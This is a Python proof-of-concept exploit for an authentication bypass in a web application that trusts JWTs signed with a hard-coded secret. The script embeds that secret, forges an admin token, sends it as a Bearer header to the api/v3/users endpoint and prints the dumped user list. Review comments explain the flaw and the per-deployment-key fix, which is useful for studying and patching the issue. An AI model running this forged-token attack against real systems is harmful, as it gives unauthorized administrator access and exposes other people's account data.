### Discovery: Omri Baso & Fabien Aunay
### Exploit Author: Omri Baso
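# ``sys`` must be bound before the ImportError handler below runs; in the
# original ordering ``sys.exit(1)`` raised NameError instead of exiting
# with the intended install hint.
import sys

try:
    # This script is written against the ``jwt`` distribution (which exposes
    # ``jwt.JWT``, ``jwt.jwk`` and ``jwt.utils``), not against PyJWT.
    import jwt
except ImportError:
    print("\n[-] python3 -m pip install jwt")
    sys.exit(1)
import requests
from datetime import datetime, timedelta, timezone
from jwt.utils import get_int_from_datetime
from jwt.jwk import OctetJWK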
def main() -> None:
    """Proof-of-concept driver for the hard-coded JWT signing secret issue.

    Takes the target base URL from ``sys.argv[1]``, signs an ``admin`` claim
    set with the fixed HS256 key embedded below, and presents the result as a
    Bearer token to ``api/v3/users``.  The weakness this demonstrates is that
    the server accepts tokens signed with a secret that is hard-coded in the
    application (and therefore public); the fix on the defending side is a
    per-deployment, randomly generated signing key (rotated if it has ever
    been exposed), after which tokens minted with the key below are rejected.

    Exits with status 1 when no target is given or when the installed ``jwt``
    module is not the ``jwt`` distribution (``OctetJWK`` is absent in PyJWT).
    All other results are reported on stdout; nothing is returned.
    """
    if len(sys.argv) < 2:
        print("\n[-] Usage: %s %s <target path>" % (sys.executable,sys.argv[0]))
        print("Example:\n\t%s %s http://127.0.0.1:9080/" % (sys.executable,sys.argv[0]))
        sys.exit(1)
    target: str = sys.argv[1]
    try:
        # The secret is a constant taken from the vulnerable application; a
        # server whose signing key is unique per installation will not accept
        # anything signed with it.
        key = OctetJWK(b"167f0db2-f83e-4baa-9736-d56064a5b415")
    except Exception:
        # ``OctetJWK`` only exists in the ``jwt`` distribution; PyJWT also
        # installs a top-level ``jwt`` module and shadows it.
        print("\n[-] python3 -m pip uninstall PyJWT")
        print("\n[-] python3 -m pip install jwt")
        print("\n[-] Exploit is not written using PyJWT!")
        sys.exit(1)
    # Claim set the server is expected to trust once the signature verifies;
    # ``exp`` is 24 hours from now in UTC.  Which claims the server actually
    # reads is not visible here.
    message: dict = {"username":"admin"
    ,"useradmin": True,"usergroup":"admin","externalauth": False,"externaltype":"","displayname":"Homer Admin","avatar":"/etc/passwd",
    'exp': get_int_from_datetime(datetime.now(timezone.utc) + timedelta(hours=24)),
    }
    instance = jwt.JWT()
    print("\n\n[+] Generating the following cookie: \n\n%s\n\n" % message)
    admin_cookie: str = instance.encode(message, key, alg='HS256')
    if(admin_cookie):
        if not (target.endswith("/")):
            target += "/"
        # NOTE(review): this ``headers`` dict is overwritten two lines below
        # and is never sent.
        headers = {'Authorization': 'Bearer %s' % admin_cookie}
        target = target + "api/v3/users"
        # NOTE(review): ``target`` already carries ``api/v3/users`` at this
        # point, so the Referer is built from the API URL, not the base URL.
        headers = {"Accept": "application/json, text/plain, */*", "Authorization": "Bearer %s" % admin_cookie, "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36", "Referer": "%spreference/users" % target, "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US,en;q=0.9", "Connection": "close"}
        r = requests.get(target, headers=headers)
        # Only a 201 is treated as success; every other status, including
        # 200, falls through to the failure branch.  A 201 on a GET is
        # unusual -- presumably what this particular API returns; confirm.
        if(r.status_code == 201):
            print("[+] Obtained Admin access!!\n")
            print("\n\n[+] Dumping Users\n\n")
            print("----------------------------------------------")
            print(r.text)
            print("\n[+] Admin Cookie: \n%s" % admin_cookie)
        else:
            print("[-] failed")
            print(r.text)
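# Guard the entry point so importing the module (e.g. for linting or reuse of
# its helpers) does not send the request as a side effect.
if __name__ == "__main__":
    main()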